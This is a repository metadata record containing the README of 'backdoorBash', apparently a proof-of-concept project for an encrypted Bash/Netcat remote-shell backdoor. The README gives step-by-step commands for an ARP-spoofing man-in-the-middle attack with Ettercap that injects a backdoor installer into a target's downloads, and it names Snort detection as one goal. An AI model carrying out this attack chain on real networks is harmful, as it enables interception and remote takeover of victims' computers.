{"id":23409277,"url":"https://github.com/pilebones/backdoorbash","last_synced_at":"2025-08-09T03:20:05.844Z","repository":{"id":24440173,"uuid":"27842095","full_name":"pilebones/backdoorBash","owner":"pilebones","description":"Unix remote-shell backdoor develop with Bash, Netcat, OpenSSL (data encryption with AES-128bit)","archived":false,"fork":false,"pushed_at":"2017-10-21T14:36:17.000Z","size":1222,"stargazers_count":25,"open_issues_count":0,"forks_count":14,"subscribers_count":1,"default_branch":"master","last_synced_at":"2025-03-25T20:07:21.844Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Shell","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pilebones.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2014-12-10T22:08:04.000Z","updated_at":"2023-09-03T15:55:54.000Z","dependencies_parsed_at":"2022-08-22T23:11:10.641Z","dependency_job_id":null,"html_url":"https://github.com/pilebones/backdoorBash","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pilebones%2FbackdoorBash","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pilebones%2FbackdoorBash/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pilebones%2FbackdoorBash/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pilebones%2FbackdoorBash/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pilebones","download_url":"https://codeload.github.com/pilebones/backdoorBash/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248498393,"owners_count":21114113,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-12-22T15:34:28.690Z","updated_at":"2025-04-12T00:22:50.314Z","avatar_url":"https://github.com/pilebones.png","language":"Shell","funding_links":[],"categories":[],"sub_categories":[],"readme":"backdoorBash\n============\n\nUnix remote-shell backdoor develop with Bash, Netcat, OpenSSL (data encryption with AES-128bit)\n\n## Introduction\n\nThis project is associated to another mine : \n- https://github.com/pilebones/etterfilterSamples\n- https://github.com/pilebones/hostingBackdoorInstaller\n\nThe main goals of this project is to implement an attack scenario as below : \n- Implement backdoor like remote-shell with Bash\n- Attack Man In the middle with Ettercap (like ARP Spoofing)\n- Hosting a backdoor installer\n- Automate data alteration to inject our backdoor inside the computer of target by a browser\n- If the target run (naively) the script (ie: the backdoor installer) without reading source-code the computer is infected and the attacker will obtain a remote-access command\n- Detect and prevent this kind of attack with NIDS tool as Snort\n\nNotice :\n- The programming language was choose only for a Proof of Concept (POC)\n- The socket layer is assumed by a portable version of Netcat. I compiled Netcat for i686 and x86_64 computer architecture a put the binary inside this project.\n- The transmited data were encrypted with AES-128 (without using Cryptocat). The data are encrypted on the fly via OpenSSL.\n\n## Requirements\n\n- openssl (tested with v1.0.1j)\n- ettercap (\u003e= v0.8.1)\n- etterfilter (\u003e= v0.8.1)\n- etterfilter (\u003e= v0.8.1)\n- netcat (The compiled version is \"The GNU Netcat\" [not BSD release] v0.7.1)\n\n## How it work ?\n\nThe backdoor-client connection work localy and remontly (inside same private network with the same access-point), ie : see \"$HOST\" inside \"config.sh\".\n\n### Simple test\n\n```bash\ngit clone git@github.com:pilebones/backdoorBash.git\ncd backdoorBash\ncp config.sh.sample config.sh \nvim config.sh\n./server.sh\nHOST=192.168.0.x ./client.sh\n```\n.... And try to execute some shell command\n\n### Real condition\n\n```bash\ngit clone git@github.com:pilebones/backdoorBash.git\ngit clone git@github.com:pilebones/etterfilterSamples.git\ngit clone git@github.com:pilebones/hostingBackdoorInstaller.git\ncp backdoorBash/config.sh.sample backdoorBash/config.sh\nvim backdoorBash/config.sh\n# For export remove client.sh *.log config.sh.sample\ntar xvzf hostingBackdoorInstaller/export.tar.gz backdoorBash/\n# Configure your vhost to hosting hostingBackdoorInstaller's project\ncd etterfilterSamples/inject_backdoor_installer/\n# Update Redirect URL from \"fake-http-redirect.txt\"\nvim fake-http-redirect.txt\nIFACE=wlanX IP_AP=192.168.0.1 IP_TARGET=192.168.0.x ./run\n# From target try to download a shell script like \"test.sh\" or try with 404 Not Found page (same behavior =\u003e inject backdoor installer)\n# From target : \"chmod +x bd_installer.sh \u0026\u0026 ./bd_installer.sh\"\nHOST=192.168.0.x ./client.sh\n```\n\n## Limitations\n\nThis backdoor is writing in bash programming language =\u003e It work only on Unix OS.\n\nCurrently, tested only on :\n- Archlinux\n- Debian 7 \n- Ubuntu 14.10\n\nWarning : \nSome recent router/box/AP/switch prevent this kind of MiTM attack. In this case, Ettercap could relay only one-way network-packets (From target to AP but not from AP to target). So Ettercap can alter the HTTP response to redirect to the backdoor's installer.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpilebones%2Fbackdoorbash","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fpilebones%2Fbackdoorbash","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fpilebones%2Fbackdoorbash/lists"}